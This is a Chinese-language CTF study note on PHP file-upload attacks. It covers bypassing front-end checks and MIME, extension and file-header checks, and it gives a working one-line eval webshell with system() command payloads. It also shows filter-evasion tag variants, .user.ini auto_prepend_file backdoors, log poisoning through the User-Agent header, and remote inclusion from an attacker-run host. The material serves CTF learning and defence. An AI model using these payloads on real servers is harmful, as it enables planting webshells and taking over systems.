本文讲述了文件上传的安全问题,包括后门创建、前端和后端验证策略、MIME类型检测、user.ini利用、编码绕过、系统命令执行、user-agent隐藏和远程路径技巧。详述了如何在CTF挑战中利用这些技巧进行攻防。
文件上传
基础知识
- 文件上传是通过一些上传漏洞上传一些后台文件到服务器上,进而达到控制服务器等目的,上传的文件必须是php文件才能够被执行,后门代码需要以特定格式后缀解析(如php、Java、asp等),不能以图片后缀解析后门代码(如果是图片后缀,执行方式会不一样,没有办法执行代码),如jpg图片中有php后门代码,但是被以jpg方式解析了,因此后门不能被触发,连接不上后门,(解析漏洞除外)
- 文件上传检测分为前端检测和后端检测两种
- 通常情况的ctf题用一句话木马就行,一句话木马
<?php @eval($_POST['pass']);?>($_POST[‘pass’])中的是密码(这里是pass),用菜刀、蚁剑等连接即可,连接时url写有后门的php的路径 - 一句话木马也可以用post请求直接连接,post的payload中写pass(前面设置的密码是啥就写啥)=system(要执行的系统命令),就拿到了shell,就可以用pass=system(‘tac path_to_flag’)看flag了,实际上pass=后面写什么,就执行什么php代码,因此不仅可以写system(),也可以写其他的php语句、函数如pass=phpinfo()
技巧手法
- 纯前端验证(前端js代码验证)由于前端js代码是在浏览器中执行的,因此f12可以直接改前端代码,直接可以绕过纯前端验证,在实际环境中发现有的前端的js是改不了的,这种情况下有两种方法:
- 1.直接在浏览器中禁用js
- 2.先发一个能过前端检测的如1.jpg,再用bp将他的名字改成1.php
- 后端对标签检测——MIME:mime是一种标准的、用来表示文档、文件、字节流等数据的格式和性质的一种流媒体类型,通用结构为type/subtype,由类型与子类型两个字符串中间用/分隔而组成。不允许空格存在。type表示可以被分多个子类的独立类别。subtype表示细分后的每个类型。MIME类型对大小写不敏感,但是传统写法都是小写
- 在post请求中,有一个字段
Content-Type是由前端自动生成的,标识了post请求的内容的MIME标识,后端可能会通过这个MIME标识进行格式检验 - bp直接改post请求就行
- 在post请求中,有一个字段
- 另外一些后端对于文件后缀名的检验可以尝试.php后缀大小写.Php,也可以尝试将后缀改为.php5 .php7,但是能不能正常解析运行这段代码取决于操作系统和中间件
- .user.ini:
- php有很多ini文件,每次运行PHP文件时,都会去读取ini文件,来设置PHP的相关规则,.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后,不需要重启服务器中间件,只需要等待user_ini.cache_ttl所设置的时间(默认为300秒),即可被重新加载
- .user.ini实际上就是一个可以由用户“自定义”的php.ini
- 其中有两个配置,可以用来制造后门:auto_append_file和auto_prepend_file,指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数,逻辑上相当于将指定的文件中的所有内容整个写入当前文件中
- 例如
auto_prepend_file=test.jpg或auto_append_file=test.jpg,相当于设置了在php文件执行前/后加载test.jpg文件,在加载时,jpg文件是作为文本加载的,因此只要在jpg文件中写上后门代码,后门代码就相当于被包含到了同一个文件夹下的每一个php文件中,这时候访问网站和.user.ini同一个目录下的index.php(一般是访问index.php,因为一般index.php会调用.user.ini的设置) - .user.ini的作用范围仅限于用一个目录及其子目录下,注意范围
- 可以先上传一个.user.ini,并在里面写上
auto_prepend_file=test.jpg,再上传一个test,jpg,就可以执行后门(这时候.user.ini生效范围内的任意php文件都是有后门的) - 需要注意的是有一些网站可能压根就没有.user.ini,也没有使用.user.ini,这时候此方法就无效了
- 后端对内容检测
- 过滤字符串’php’
- 标准的php代码格式
<?php echo '123'; ?> - 变种1
<? echo '123'; ?>需要配置short_open_tags=on - 变种2
<?=表达式?>不需要配置 - 变种3
<% echo '123'; %>需要配置asp_tags=on - 变种4
<script language="php">echo '123'; </script>不需要配置
- 标准的php代码格式
- 过滤[]
- 可以用{}替换
- 过滤;
- 使用上面过滤php中提到的变种2
<?=(表达式)?>就可以
- 使用上面过滤php中提到的变种2
- 过滤()
- 过滤()很难办,很多后门啥的基本没戏,好在php中用反引号`包裹的内容会直接被视作类似system()函数的功能,直接执行系统命令,例如命令
<?=`tac ../flag.php`?>在被执行时会直接调用系统的tac命令,因此()被过滤时可以通过反引号执行下面说的 tac …/flag.php以此绕过()打印flag
- 过滤()很难办,很多后门啥的基本没戏,好在php中用反引号`包裹的内容会直接被视作类似system()函数的功能,直接执行系统命令,例如命令
- 因为过滤等问题实在传不上去木马,也可以考虑直接通过user.init.导致的代码执行直接去读一些数据
- php中system(‘command’)可以直接执行command的指令(系统命令),并且将结果回显到屏幕上,可以配合linux中的tac命令,用于按行反向显示文件内容。它会按照文件的相反顺序显示内容,
system('tac ../flag.php')可以显示flag的内容,如果php甚至flag被过滤则可以使用fl*自动补全功能,只有一个匹配项的话可以自动补全
- 过滤字符串’php’
- 受限于文件内容过滤,可能连反引号`都过滤了,那么连直接打印flag都做不到,就考虑通过一些邪门的上传方法,不通过预期的上传点位上传,而通过其他位置上传
-
- user-agent
- 在apache,nginx等中间件中都有一个日志文档,如nginx中/var/log/nginx/下面有error.log和access_log,用户访问时的user-agent会被记录到access_log中,因此可以将一句话木马或者其他后门通过user-agent写入access_log中(user-agent的过滤检测一般没有那么严格)
- 将后门或者显示flag的命令写入access_log后,access_log文件本身是没有执行权限的,因此还需要用
.user.ini将一个1.jpg包含到php文件中(一般不能直接用.user.ini将access.log直接包含到php中,而是需要一个图片文件作为桥梁),1.jpg的内容为<?=include"/var/log/nginx/access.log"?>,当然在很多情况下为了应对过滤,可以使用<?=include"/var/lo"."g/nginx/access.lo"."g"?>在php中"ab"."c"代表字符串拼接 - 这样打开.user.ini目录下的index.php后,access.log的内容就已经在index.php中了,这些语句就有了执行权限,当然也包括后门或者输出flag的语句,就可以用蚁剑连接index.php啦
-
- 远程路径
- 在上传的图片文件内容中,有时候过滤极其严格,例如连
.都不能出现,.user.ini就没法写auto_append_file=test.jpg,可以将test.jpg直接写成xxx,不带后缀,也是一样的 - 还有一种情况是过滤很严格,很难搞,可以在.user.ini中写
auto_append_file=http://ip地址这样可以把该ip地址对应的网页的php文件包含到当前网页中来,也就是说可以自己弄个网站,主页写上后门,用来被访问。注意ip地址和int是可以互相转换的,在访问时效果一样,这里由于可能过滤了.,可以将ip地址转化为int写入,这样就可以绕过.过滤 - 还可以先在.user.ini中写
auto_append_file=xxx,再在xxx中写<?=include'http://ip地址'?>通过xxx作呕为桥梁将php文件包含进来
-
- 后端对文件头过滤
- 每个文件的头部会有一些字节用特定的编码来标识文件的格式,一些后端的代码会通过读取文件头部来判断上传的文件是否为图片,(有时候可能还会判断文件头和后缀是否一致)最好写的是git的文件头
GIF89a,文件头和代码用空格或换行隔开 - 有文件头过滤的时候,需要在要传的文件基础上加文件头,来确保上传成功
- 然而由于文件头的存在,肯定是不可能直接传一个.php的,因此也需要用到.user.init来将上传的文件包含到其他php文件中执行
- 每个文件的头部会有一些字节用特定的编码来标识文件的格式,一些后端的代码会通过读取文件头部来判断上传的文件是否为图片,(有时候可能还会判断文件头和后缀是否一致)最好写的是git的文件头
做题过程
-
- 改前端代码或用bp绕过前端过滤
-
- 判断能不能直接传php
- 抓包改MINE
- 改php文件后缀,大小写,php5,php7等
- 不能传php则进行下一步
-
- 不能传php,只能传图片,则将php文件后缀改为图片格式:
- 判断一下有没有文件头检查,有的话加文件头
- 尝试一下.user.ini,让图片可以被执行(除非能直接传一个php上去,否则只要需要传的是图片,图片本身无法执行,都需要.user.ini将图片内的代码包含到可执行的php代码中去执行),注意.user.ini也有可能有内容或者文件头的过滤
- 传图片也可能有后端内容检查,尝试各种过滤绕过
- 后门代码绕过不了,考虑不植入后门,而是直接用system()或``进行系统命令调用
-
- 发现上传的文件的内容检查太严,连``都过滤了,什么都写不了,实在没办法了,尝试一下别的上传方法
- user-agent,将后门写到user-agent中,代码会写入access.log,将用.user.ini和1.jpg两个桥梁将log中的可执行命令写到可执行php中
- 远程地址,.user.ini将远程网页上的有后门的php包含到网页中来
扫一扫
到【灌水乐园】发言
